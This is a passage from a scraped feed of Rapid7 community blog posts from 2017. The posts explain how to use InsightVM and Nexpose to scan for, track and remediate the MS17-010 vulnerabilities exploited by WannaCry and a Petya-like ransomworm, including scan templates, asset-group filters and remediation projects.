href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a href=\"https://files.slack.com/files-pri/T3V1ZDQHM-F5Q3XUAF6/pasted_image_at_2017_06_07_07_29_am.png\"><img class=\"jive-image\" height=\"260\" src=\"https://files.slack.com/files-pri/T3V1ZDQHM-F5Q3XUAF6/pasted_image_at_2017_06_07_07_29_am.png\" style=\"height: 280px; width: 815px;\" width=\"758\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR <span style=\"color: #000000; font-family: Calibri; font-size: 16px; background-color: #f6f6f6;\">asset.vulnerability.title CONTAINS \"cve-2017-0146\"</span>asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"font-size: 14pt;\"><strong>Creating a SQL Query Export</strong></span></p><p>@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: <a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning & Reporting</a></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the “Projects” tab and click “Create a Project”:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds <=> ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you’ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don’t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:671843e7-7237-482e-9c1c-b149f122c46e] -->", "cvss3": {}, "published": "2017-06-07T14:57:05", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "type": "rapid7community", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-06-07T14:57:05", "id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-28T03:17:01", "description": "<!-- [DocumentBodyStart:736fb2f2-6580-4bdc-908e-ca4c7c801548] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several european countries and the US. It is believed that the ransomworm may achieve its initial infection via a malicious document attached to a phishing email, and then leverages the </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">EternalBlue </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">and </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">DoublePulsar </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, ExternalBlue was leveraged for </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">WannaCry</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities</span><span style=\"font-size: 11pt; font-family: Arial; color: #ff0000;\">. </span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For the latest updates on this ransomworm, please see Rapid7’s </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">recommended actions</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven’t done so already, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">download a trial of InsightVM here</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Scan Template</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 </span><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">is as follows:</span></p><p style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">1.  Under the Administration tab, go to Templates > Manage Templates</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67229/Admin-ManageTemplates.gif\"><img alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67229/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">2. Copy the following template: Full Audit without Web Spider. Don't forget to give your copy a name and description.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67230/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67230/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">3. First uncheck \"Policies\". Click on Vulnerability Checks and then \"By Individual Checks\"</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67231/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67231/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">4. <span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Add Check “</span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">MS17-010</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">” and click Save:</span></span></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67232/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67232/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p dir=\"ltr\" style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should return checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"padding-left: 30px;\">5. <span style=\"color: #000000; font-size: 11pt; font-family: Arial;\">Save the template and run a scan to identify all assets with MS17-010.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dynamic Asset Group</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the </span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">InsightVM</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> console, just under the search button:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67235/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67235/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67236/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67236/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dashboard</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities. </span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Also, check out the new </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">Threat Feed dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">If you want to build your own, </span><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">here’s </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">how you can build a custom dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">, with examples taken from the Shadow Brokers leak.  To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: 'courier new', courier;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning & Reporting.</a></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Remediation Project</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project to track the progress of remediation. To do this, go to the “Projects” tab and click “Create a Project”:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in <span style=\"font-family: 'courier new', courier;\">vulnerability.alternateIds.altId CONTAINS \"MS17-010\"</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">JIRA or ServiceNow</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you’ll be able to quickly scan for the vulnerabilities leveraged by this ransomworm. If you have any questions please don’t hesitate to let us know!</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on this ransomworm, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">please visit this page</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p></div><!-- [DocumentBodyEnd:736fb2f2-6580-4bdc-908e-ca4c7c801548] -->", "cvss3": {}, "published": "2017-06-28T00:06:12", "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "type": "rapid7community", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-06-28T00:06:12", "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/protecting-against-petya-like-ransom-worm-with-insightvm-and-nexpose", "id": "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-05-16T18:48:52", "description": "<!-- [DocumentBodyStart:bc62d177-a43a-4d62-b4f0-851708246874] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren’t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span 